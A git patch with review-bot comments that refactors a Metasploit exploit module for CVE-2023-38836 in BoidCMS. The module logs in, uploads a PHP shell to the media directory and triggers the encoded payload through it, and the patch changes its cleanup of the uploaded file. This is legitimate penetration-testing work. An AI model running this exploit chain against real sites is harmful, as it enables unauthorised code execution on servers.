From 8a1f5de8f1dbdfc1933f5f30b447d4889b1a552e Mon Sep 17 00:00:00 2001
From: bwatters
Date: Thu, 15 Feb 2024 10:00:44 -0600
Subject: [PATCH] Fix msftidy issue and update file delete
---
 .../multi/http/cve_2023_38836_boidcms.rb | 46 ++++++++-----------
 1 file changed, 18 insertions(+), 28 deletions(-)
diff --git a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
index 681580d4c9..b270e29086 100644
--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
 prepend Exploit::Remote::AutoCheck
 def initialize(info = {})
@@ -60,6 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 ])
 @token = nil
+ @shell_filename = nil
 end
 def check
@@ -97,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
 @token = extract_token(res)
 end
- def cms_login(login_token)
+ def cms_login?(login_token)
 vprint_status('Logging into CMS')
 cms_password = datastore['CMS_PASSWORD']
 cms_username = datastore['CMS_USERNAME']
@@ -126,16 +128,11 @@ class MetasploitModule < Msf::Exploit::Remote
 'keep_cookies' => true,
 'vars_form_data' => vars_form_data
 )
- if res && res.code == 302
- return true
- else
- return false
- end
+ res && res.code == 302
 end
- def upload_php(login_token, shell_filename)
+ def upload_php?(login_token, shell_filename)
 vprint_status("Uploading PHP file #{shell_filename}")
-
 vars_form_data = [
 {
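Review bot: The new last expression of `cms_login?`, `res && res.code == 302`, evaluates to `nil` rather than `false` when `send_request_cgi` returns no response, so the `?` method is not strictly boolean; `res&.code == 302` yields a real boolean in both cases. The same line closes `upload_php?` in the next hunk. Because a missing response and a wrong status code collapse into one falsy value, the caller reports both as `Failure::UnexpectedReply`; checking `res.nil?` first and failing with `Failure::Unreachable` would keep the two outcomes distinguishable in the run log. The middle of both method bodies lies outside the visible hunk lines.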
@@ -154,20 +151,19 @@ class MetasploitModule < Msf::Exploit::Remote
 ]
 res = send_request_cgi(
- 'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
+ 'uri' => normalize_uri(target_uri.path, 'admin'),
 'method' => 'POST',
 'keep_cookies' => true,
+ 'vars_get' => {
+ 'page' => 'media'
+ },
 'vars_form_data' => vars_form_data
 )
- if res && res.code == 302
- return true
- else
- return false
- end
+ res && res.code == 302
 end
 def launch_payload(shell_filename, payload_cmd)
- # retrieve output
+ # send the command to the php page
 vprint_status('launching Payload')
 send_request_cgi(
 'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
@@ -180,25 +176,19 @@ class MetasploitModule < Msf::Exploit::Remote
 )
 end
- def on_new_session(session)
- super
- vprint_status("Attempting to delete #{@shell_filename}")
- if session.type == 'meterpreter'
- session.fs.file.rm(@shell_filename)
- else
- print_warning("Failed to automatically delete #{@shell_filename}")
- end
- end
-
 def exploit
 payload_cmd = payload.encoded
 @shell_filename = datastore['PHP_FILENAME']
 login_token = cms_token
 fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
- fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login(login_token)
- fail_with(Failure::UnexpectedReply, 'Failed to upload php files') unless upload_php(login_token, @shell_filename)
- launch_payload(@shell_filename, payload_cmd)
+ fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)
+ if upload_php?(login_token, @shell_filename)
+ register_file_for_cleanup @shell_filename
+ launch_payload(@shell_filename, payload_cmd)
+ else
+ fail_with(Failure::UnexpectedReply, 'Failed to upload php files')
+ end
 end
 end
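Review bot: In `exploit`, `register_file_for_cleanup @shell_filename` registers the bare filename, while `launch_payload` requests the file under `/media/`, so removal of the uploaded file depends on the session's working directory being that upload directory. Nothing visible in the patch establishes this (the removed `on_new_session` made the same assumption), so it should be confirmed on a test install or documented with a comment such as `# cleanup path is relative to the session cwd, expected to be the media directory`. The new `if`/`else` also departs from the guard style of the lines above it; `fail_with(Failure::UnexpectedReply, 'Failed to upload php files') unless upload_php?(login_token, @shell_filename)` followed by `register_file_for_cleanup(@shell_filename)` and the launch call reads the same way as the login check and keeps the call parenthesised like its neighbours.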